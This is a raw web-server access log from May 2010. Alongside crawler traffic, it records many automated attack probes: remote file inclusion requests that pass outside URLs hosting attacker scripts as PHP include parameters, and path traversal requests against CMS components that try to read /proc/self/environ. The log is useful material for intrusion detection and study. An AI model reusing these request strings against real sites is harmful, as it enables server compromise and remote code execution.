59.42.10.71 - - [15/May/2010:10:39:41 -0500] "GET /////////?cms[tngpath]=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt?? HTTP/1.1" 200 1010 "-""libwww-perl/5.831"
59.42.10.71 - - [15/May/2010:10:39:42 -0500] "GET /////////?cms[tngpath]=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt?? HTTP/1.1" 200 1010 "-""libwww-perl/5.831"
59.42.10.71 - - [15/May/2010:10:39:43 -0500] "GET /logs/////////?cms[tngpath]=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt?? HTTP/1.1" 200 5650 "-""libwww-perl/5.831"
59.42.10.71 - - [15/May/2010:10:39:43 -0500] "GET /logs/////////?cms[tngpath]=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt?? HTTP/1.1" 200 5650 "-""libwww-perl/5.831"
89.221.175.60 - - [15/May/2010:10:40:32 -0500] "GET /logs/access_log.1273276800//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.810"
87.250.255.243 - - [15/May/2010:10:42:46 -0500] "GET /costume/thmb8.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.46 - - [15/May/2010:10:46:39 -0500] "GET /logs/access_log.1202169600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.195.233 - - [15/May/2010:10:50:39 -0500] "GET /logs/access_log.1196294400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
121.88.4.141 - - [15/May/2010:10:51:36 -0500] "GET //language/lang_english/lang_activity.php?phpbb_root_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
121.88.4.141 - - [15/May/2010:10:51:36 -0500] "GET /logs//language/lang_english/lang_activity.php?phpbb_root_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
121.88.4.141 - - [15/May/2010:10:51:37 -0500] "GET /logs/access_log.1264118400//language/lang_english/lang_activity.php?phpbb_root_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
121.88.4.141 - - [15/May/2010:10:51:50 -0500] "GET /logs/access_log.1265241600//language/lang_english/lang_activity.php?phpbb_root_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
220.80.108.70 - - [15/May/2010:10:52:01 -0500] "GET //language/lang_english/lang_activity.php?phpbb_root_path=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
220.80.108.70 - - [15/May/2010:10:52:01 -0500] "GET /logs//language/lang_english/lang_activity.php?phpbb_root_path=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
220.80.108.70 - - [15/May/2010:10:52:03 -0500] "GET /logs/access_log.1273104000//language/lang_english/lang_activity.php?phpbb_root_path=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
121.88.4.141 - - [15/May/2010:10:53:02 -0500] "GET /logs/access_log.1273104000//language/lang_english/lang_activity.php?phpbb_root_path=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
121.88.4.141 - - [15/May/2010:10:53:02 -0500] "GET //language/lang_english/lang_activity.php?phpbb_root_path=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
121.88.4.141 - - [15/May/2010:10:53:02 -0500] "GET /logs//language/lang_english/lang_activity.php?phpbb_root_path=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
121.88.4.141 - - [15/May/2010:10:54:40 -0500] "GET /logs/access_log.1264118400//language/lang_english/lang_activity.php?phpbb_root_path=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
220.80.108.70 - - [15/May/2010:10:54:56 -0500] "GET /logs/access_log.1264118400//language/lang_english/lang_activity.php?phpbb_root_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
220.80.108.70 - - [15/May/2010:10:54:56 -0500] "GET //language/lang_english/lang_activity.php?phpbb_root_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
220.80.108.70 - - [15/May/2010:10:54:56 -0500] "GET /logs//language/lang_english/lang_activity.php?phpbb_root_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
220.80.108.70 - - [15/May/2010:10:55:01 -0500] "GET /logs/access_log.1265241600//language/lang_english/lang_activity.php?phpbb_root_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
121.88.4.141 - - [15/May/2010:10:55:18 -0500] "GET /logs/access_log.1265241600//language/lang_english/lang_activity.php?phpbb_root_path=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
220.80.108.70 - - [15/May/2010:10:57:45 -0500] "GET /logs/access_log.1264118400//language/lang_english/lang_activity.php?phpbb_root_path=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
220.80.108.70 - - [15/May/2010:10:57:53 -0500] "GET /logs/access_log.1265241600//language/lang_english/lang_activity.php?phpbb_root_path=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
220.80.108.70 - - [15/May/2010:10:59:59 -0500] "GET /logs/access_log.1262649600/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
220.80.108.70 - - [15/May/2010:11:00:01 -0500] "GET /logs/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
220.80.108.70 - - [15/May/2010:11:00:02 -0500] "GET /administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
87.250.255.243 - - [15/May/2010:11:00:46 -0500] "GET /logs/access_log.1244505600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [15/May/2010:11:03:44 -0500] "GET /logs/access_log.1163894400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.134 - - [15/May/2010:11:04:39 -0500] "GET /logs/access_log.1233187200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.252.3.230 - - [15/May/2010:11:05:06 -0500] "GET //index.php?page=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
87.252.3.230 - - [15/May/2010:11:05:06 -0500] "GET /logs//index.php?page=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
207.46.13.100 - - [15/May/2010:11:06:09 -0500] "GET /logs/access_log.1230249600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
84.40.30.37 - - [15/May/2010:11:06:56 -0500] "GET //inc/header.php/step_one.php?server_inc=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
84.40.30.37 - - [15/May/2010:11:06:56 -0500] "GET /logs//inc/header.php/step_one.php?server_inc=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 317 "-""Mozilla/5.0"
84.40.30.37 - - [15/May/2010:11:06:58 -0500] "GET //inc/header.php/step_one.php?server_inc=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
84.40.30.37 - - [15/May/2010:11:06:58 -0500] "GET /logs//inc/header.php/step_one.php?server_inc=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 317 "-""Mozilla/5.0"
207.45.186.2 - - [15/May/2010:11:06:59 -0500] "GET /logs/access_log.1273276800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.833"
207.45.186.2 - - [15/May/2010:11:06:59 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.833"
207.45.186.2 - - [15/May/2010:11:07:00 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.833"
84.40.30.37 - - [15/May/2010:11:07:02 -0500] "GET /logs/access_log.1263081600//inc/header.php/step_one.php?server_inc=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
84.40.30.37 - - [15/May/2010:11:07:03 -0500] "GET /logs/access_log.1263081600//inc/header.php/step_one.php?server_inc=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
84.40.30.37 - - [15/May/2010:11:07:03 -0500] "GET /logs/access_log.1262563200//inc/header.php/step_one.php?server_inc=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
207.45.186.2 - - [15/May/2010:11:07:05 -0500] "GET /logs/access_log.1273276800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.833"
207.45.186.2 - - [15/May/2010:11:07:05 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.833"
207.45.186.2 - - [15/May/2010:11:07:05 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.833"
84.40.30.37 - - [15/May/2010:11:07:07 -0500] "GET /logs/access_log.1262563200//inc/header.php/step_one.php?server_inc=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
207.45.186.2 - - [15/May/2010:11:07:20 -0500] "GET /logs/access_log.1273276800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.833"
207.45.186.2 - - [15/May/2010:11:07:20 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.833"
207.45.186.2 - - [15/May/2010:11:07:20 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.833"
84.40.30.37 - - [15/May/2010:11:07:27 -0500] "GET /logs/access_log.1263081600//inc/header.php/step_one.php?server_inc=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
84.40.30.37 - - [15/May/2010:11:07:31 -0500] "GET /logs//inc/header.php/step_one.php?server_inc=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 317 "-""Mozilla/5.0"
84.40.30.37 - - [15/May/2010:11:07:31 -0500] "GET //inc/header.php/step_one.php?server_inc=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
84.40.30.37 - - [15/May/2010:11:07:32 -0500] "GET /logs/access_log.1262563200//inc/header.php/step_one.php?server_inc=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
84.40.30.37 - - [15/May/2010:11:07:38 -0500] "GET /logs/access_log.1263081600//inc/header.php/step_one.php?server_inc=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
84.40.30.37 - - [15/May/2010:11:07:38 -0500] "GET //inc/header.php/step_one.php?server_inc=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
84.40.30.37 - - [15/May/2010:11:07:38 -0500] "GET /logs//inc/header.php/step_one.php?server_inc=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 317 "-""Mozilla/5.0"
84.40.30.37 - - [15/May/2010:11:07:38 -0500] "GET /logs/access_log.1262563200//inc/header.php/step_one.php?server_inc=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
220.80.108.70 - - [15/May/2010:11:07:40 -0500] "GET /logs/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 341 "-""libwww-perl/5.79"
220.80.108.70 - - [15/May/2010:11:07:41 -0500] "GET /administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 336 "-""libwww-perl/5.79"
67.195.112.180 - - [15/May/2010:11:11:00 -0500] "GET /logs/access_log.1238976000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
204.15.190.163 - - [15/May/2010:11:11:03 -0500] "GET /*.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.813"
207.46.13.91 - - [15/May/2010:11:12:09 -0500] "GET /logs/access_log.1179792000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
220.80.108.70 - - [15/May/2010:11:14:39 -0500] "GET /logs/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 341 "-""libwww-perl/5.79"
220.80.108.70 - - [15/May/2010:11:14:40 -0500] "GET /administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 336 "-""libwww-perl/5.79"
207.46.204.189 - - [15/May/2010:11:16:38 -0500] "GET /logs/?D=A HTTP/1.1" 200 5638 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.230 - - [15/May/2010:11:17:10 -0500] "GET /logs/access_log.1271116800 HTTP/1.1" 200 614646 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [15/May/2010:11:18:45 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [15/May/2010:11:19:18 -0500] "GET /logs/access_log.1174089600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.231 - - [15/May/2010:11:22:39 -0500] "GET /logs/?M=A HTTP/1.1" 200 5638 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.190 - - [15/May/2010:11:26:09 -0500] "GET /logs/access_log.1187481600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.218.116.133 - - [15/May/2010:11:28:28 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
87.250.255.243 - - [15/May/2010:11:30:15 -0500] "GET /logs/access_log.1223769600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
204.15.190.163 - - [15/May/2010:11:30:25 -0500] "GET /logs/access_log.1217376000/*.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.813"
204.15.190.163 - - [15/May/2010:11:30:25 -0500] "GET /*.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.813"
204.15.190.163 - - [15/May/2010:11:30:25 -0500] "GET /logs/*.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
216.129.119.43 - - [15/May/2010:11:35:53 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
121.78.118.123 - - [15/May/2010:11:44:59 -0500] "GET /delete_all.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 298 "-""Mozilla/5.0"
121.78.118.123 - - [15/May/2010:11:44:59 -0500] "GET /logs/delete_all.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 303 "-""Mozilla/5.0"
121.78.118.123 - - [15/May/2010:11:44:59 -0500] "GET /logs/access_log.1266278400/delete_all.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 325 "-""Mozilla/5.0"
121.78.118.123 - - [15/May/2010:11:44:59 -0500] "GET /logs/access_log.1265241600/delete_all.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 325 "-""Mozilla/5.0"
121.78.118.123 - - [15/May/2010:11:45:22 -0500] "GET /delete_all.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 298 "-""Mozilla/5.0"
121.78.118.123 - - [15/May/2010:11:45:22 -0500] "GET /logs/access_log.1266278400/delete_all.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 325 "-""Mozilla/5.0"
121.78.118.123 - - [15/May/2010:11:45:22 -0500] "GET /logs/access_log.1265241600/delete_all.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 325 "-""Mozilla/5.0"
121.78.118.123 - - [15/May/2010:11:45:22 -0500] "GET /logs/delete_all.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 303 "-""Mozilla/5.0"
211.245.21.109 - - [15/May/2010:11:45:34 -0500] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
207.46.13.144 - - [15/May/2010:11:48:40 -0500] "GET /logs/access_log.1270512000 HTTP/1.1" 200 675172 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [15/May/2010:11:49:33 -0500] "GET /logs/access_log.1192320000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.13.89 - - [15/May/2010:11:51:09 -0500] "GET /logs/access_log.1169856000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [15/May/2010:11:52:26 -0500] "GET /logs/access_log.1201392000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
204.152.200.50 - - [15/May/2010:11:54:11 -0500] "GET /logs/index.php?option=com_custompages&cpage=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
204.152.200.50 - - [15/May/2010:11:54:11 -0500] "GET /index.php?option=com_custompages&cpage=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
204.152.200.50 - - [15/May/2010:11:54:15 -0500] "GET /logs/index.php?option=com_custompages&cpage=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
204.152.200.50 - - [15/May/2010:11:54:15 -0500] "GET /index.php?option=com_custompages&cpage=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
207.46.199.52 - - [15/May/2010:11:55:40 -0500] "GET /artwork/banners.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.218.116.165 - - [15/May/2010:11:58:41 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
211.245.21.109 - - [15/May/2010:11:59:27 -0500] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
211.245.21.109 - - [15/May/2010:11:59:28 -0500] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
204.152.200.50 - - [15/May/2010:12:10:19 -0500] "GET /index1.php?page=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
204.152.200.50 - - [15/May/2010:12:10:19 -0500] "GET /index1.php?page=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
67.195.112.180 - - [15/May/2010:12:10:39 -0500] "GET /tattoo/set1.htm HTTP/1.0" 200 2362 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [15/May/2010:12:11:17 -0500] "GET /logs/access_log.1273190400 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [15/May/2010:12:16:16 -0500] "GET /artwork/toys.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
208.115.111.248 - - [15/May/2010:12:16:42 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
67.195.112.180 - - [15/May/2010:12:20:03 -0500] "GET /logs/access_log.1185667200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [15/May/2010:12:21:10 -0500] "GET /artwork/paintings.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
204.152.200.50 - - [15/May/2010:12:21:20 -0500] "GET /logs/access_log.1270857600/index1.php?page=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
204.152.200.50 - - [15/May/2010:12:21:20 -0500] "GET /index1.php?page=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
204.152.200.50 - - [15/May/2010:12:21:20 -0500] "GET /logs/index1.php?page=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
204.152.200.50 - - [15/May/2010:12:21:33 -0500] "GET /logs/access_log.1270857600/index1.php?page=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
204.152.200.50 - - [15/May/2010:12:21:33 -0500] "GET /index1.php?page=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
204.152.200.50 - - [15/May/2010:12:21:33 -0500] "GET /logs/index1.php?page=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
213.239.210.93 - - [15/May/2010:12:23:56 -0500] "GET /module_db.php?pivot_path=http://fedr.interfree.it/id.jpg? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
213.239.210.93 - - [15/May/2010:12:23:56 -0500] "GET /logs/module_db.php?pivot_path=http://fedr.interfree.it/id.jpg? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
87.250.255.243 - - [15/May/2010:12:25:05 -0500] "GET /logs/access_log.1273276800 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [15/May/2010:12:32:22 -0500] "GET /artwork/artmaster.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
123.30.181.5 - - [15/May/2010:12:35:51 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
123.30.181.5 - - [15/May/2010:12:35:51 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
123.30.181.5 - - [15/May/2010:12:35:51 -0500] "GET /logs/access_log.1268956800%20%20//poll/poll_ssi.php?include_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
123.30.181.5 - - [15/May/2010:12:35:51 -0500] "GET //poll/poll_ssi.php?include_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
123.30.181.5 - - [15/May/2010:12:35:51 -0500] "GET /logs/access_log.1268956800%20%20//poll/poll_ssi.php?include_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
123.30.181.5 - - [15/May/2010:12:35:51 -0500] "GET //poll/poll_ssi.php?include_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
123.30.181.5 - - [15/May/2010:12:35:51 -0500] "GET //poll/poll_ssi.php?include_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
123.30.181.5 - - [15/May/2010:12:35:51 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
123.30.181.5 - - [15/May/2010:12:35:51 -0500] "GET /logs/access_log.1268956800%20%20//poll/poll_ssi.php?include_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
123.30.181.5 - - [15/May/2010:12:36:12 -0500] "GET /logs/access_log.1268956800//poll/poll_ssi.php?include_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
123.30.181.5 - - [15/May/2010:12:36:12 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
123.30.181.5 - - [15/May/2010:12:36:12 -0500] "GET //poll/poll_ssi.php?include_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
